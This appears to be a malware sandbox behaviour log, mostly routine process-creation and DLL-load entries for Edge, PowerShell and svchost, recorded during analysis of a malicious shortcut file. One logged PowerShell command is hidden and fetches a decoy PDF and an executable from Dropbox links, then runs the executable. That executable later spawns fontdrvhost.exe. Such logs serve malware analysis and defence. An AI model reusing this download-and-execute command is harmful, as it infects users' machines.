                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6812 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7096 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7816 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8424 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:6Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6992 --field-trial-handle=1992,i,9439296956823989521,1542117106536220909,262144 /prefetch:8Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user~1\AppData\Local\Temp\1902382389.pdf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1061714629.exe "C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=2068,i,17729385765362117202,6061086307016693988,262144 /prefetch:3
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Users\user\AppData\Local\Temp\1061714629.exe "C:\Users\user~1\AppData\Local\Temp\1061714629.exe"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: l92fYljXWF.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: wkernel32.pdb source: 1061714629.exe, 00000022.00000003.1899986136.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900088763.0000000002FD0000.00000004.00000001.00020000.00000000.sdmp
